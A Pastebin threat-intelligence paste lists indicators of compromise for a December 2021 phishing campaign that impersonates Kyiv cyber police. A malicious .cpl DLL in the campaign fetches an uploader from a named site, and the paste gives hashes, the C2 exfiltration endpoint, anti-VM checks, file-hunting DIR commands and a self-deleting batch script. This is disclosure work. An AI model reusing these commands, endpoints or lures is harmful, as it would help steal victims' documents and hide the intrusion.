API tools faq
paste
Advertisement
VRad

#autoit_171221

VRad
Dec 17th, 2021 (edited)
912
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.52 KB | None | 0 0
raw download clone embed print report
  1. #IOC #OptiData #VR #Autoit #DLL #TA471 #uploader
  2.  
  3. https://pastebin.com/rYsMt3vH
  4.  
  5. previous_contact:
  6. 24/07/21 https://pastebin.com/qHHUgBNK
  7. 12/04/21 https://pastebin.com/yBpP4PPw
  8.  
  9. FAQ:
  10. https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_083
  11.  
  12. attack_vector
  13. --------------
  14. email > attach .rar > pdf.cpl (DLL) > GET stun.site/zepok101.exe > Users\Public\svchosts.exe > exfil to 185.244.41.109
  15.  
  16.  
  17. email_headers
  18. --------------
  19. List-Id: <tobnosimey.outlook.com>
  20. From: Управління протидії кіберзлочинам в місті Києві <police387@npu.gov.ua> <tobnosimey@outlook.com>
  21. Subject: re: Повідомлення про підозру у порушенні закону
  22. Date: Fri, 17 Dec 2021 16:10:00 +0300
  23. Return-Path: tobnosimey@outlook.com
  24. X-OriginatorOrg: outlook.com
  25.  
  26.  
  27. files
  28. --------------
  29. SHA-256 ef6f02c41b4bad58fc1930d0ed00a5db1e122b89bc2782ba4dbdc785bc07dba0
  30. File name pdf - Приклад заповнення пояснювальної текст заповнюється вручну.rar [ RAR archive data ]
  31. File size 10.87 KB (11130 bytes)
  32.  
  33. SHA-256 a318fbaddaa11df5edde620b4c45ff31316dcfadf085d0f862004c857be568d7
  34. File name pdf - Приклад заповнення пояснювальної текст заповнюється вручну.cpl [ Win32 DLL ]
  35. File size 10.50 KB (10752 bytes)
  36.  
  37. SHA-256 7e1355e51eb9c38e006368de1ae80b268ffab6918237696474f50802e3d8a9c8
  38. File name zepok101.exe (svchosts.exe) [ PE32 executable for MS Windows (GUI) Intel 80386 32-bit ASProtect v1.23 RC1 ]
  39. File size 2.52 MB (2641264 bytes)
  40.  
  41. SHA-256 6f3994ad6b418b55ba2a3cd4f4d8cff35284a5790ea3dd38f1abf8699410430a
  42. File name zepok101_unpack.bin [ PE32 executable for MS Windows (GUI) Intel 80386 32-bit ]
  43. File size 4.93 MB (5169152 bytes)
  44.  
  45.  
  46. activity
  47. **************
  48. PL_SCR https://stun.site/zepok101.exe ( 37.9.13.206:443 )
  49.  
  50. C2 185.244.41.109:8080/upld/
  51.  
  52. Anti-VM
  53. **************
  54. + Detects Sandboxie through the presence of a library
  55. + Checks the version of Bios, possibly for anti-virtualization [\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion]
  56. + Detects VirtualBox through the presence of a registry key [ HKLM\HARDWARE\ACPI\DSDT\VBOX__ ]
  57.  
  58. netwrk
  59. --------------
  60. 185.244.41.109:8080 POST /upld/AC38D1C7 HTTP/1.1 (application/upload) Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  61.  
  62. comp
  63. --------------
  64. rundll32.exe 2672 TCP 37.9.13.206 443 ESTABLISHED
  65. svchosts.exe 2720 TCP 185.244.41.109 8080 ESTABLISHED
  66.  
  67. proc
  68. --------------
  69. "C:\Windows\System32\control.exe" "C:\Users\operator\Desktop\pdf_DLL.cpl",
  70. "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\operator\Desktop\pdf_DLL.cpl",
  71. C:\Users\Public\svchosts.exe
  72. C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.csv" /S /B /A
  73. C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.doc" /S /B /A
  74. C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.pdf" /S /B /A
  75. ...
  76. C:\Windows\system32\cmd.exe /U /C DIR "\Users\operator\*.7z" /S /B /A
  77.  
  78. C:\Windows\system32\cmd.exe cmd /c start /min r.bat
  79. C:\Windows\system32\cmd.exe /K r.bat
  80. C:\Windows\SysWOW64\cmd.exe /min /c del "C:\Users\Public\r.bat"
  81. C:\Windows\SysWOW64\taskkill.exe /IM cmd.exe /F
  82.  
  83. persist
  84. --------------
  85. n/a
  86.  
  87. drop
  88. --------------
  89. C:\Users\Public\svchosts.exe
  90. C:\Users\Public\r.bat
  91.  
  92. r.bat
  93. --------------
  94. @echo off
  95. :tryrem
  96. del svchosts.exe
  97. if exist svchosts.exe (goto tryrem)
  98. start /b "" cmd /min /c del "%~f0"& Taskkill /IM cmd.exe /F&exit /b
  99.  
  100.  
  101. Files details
  102. --------------
  103. RAR https://www.virustotal.com/gui/file/ef6f02c41b4bad58fc1930d0ed00a5db1e122b89bc2782ba4dbdc785bc07dba0/details
  104. DLL https://www.virustotal.com/gui/file/a318fbaddaa11df5edde620b4c45ff31316dcfadf085d0f862004c857be568d7/details
  105. EXE https://www.virustotal.com/gui/file/7e1355e51eb9c38e006368de1ae80b268ffab6918237696474f50802e3d8a9c8/details
  106. EXE_unp https://www.virustotal.com/gui/file/6f3994ad6b418b55ba2a3cd4f4d8cff35284a5790ea3dd38f1abf8699410430a/details
  107.  
  108. DLL https://www.unpac.me/results/89a184de-0712-4673-8238-f9ecd86c7362
  109. EXE https://www.unpac.me/results/40da648c-cf5e-4d13-ad39-5a42b087d945
  110.  
  111. DLL https://analyze.intezer.com/analyses/159836bf-8ed5-4b6c-8ffa-e3c28f51f181
  112. EXE https://analyze.intezer.com/analyses/35f76754-f612-4306-924b-3f47cb862e83
  113. EXE_unp https://analyze.intezer.com/analyses/985987ff-81cb-4a88-b4a7-413f793c6744
  114.  
  115. VR
  116.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!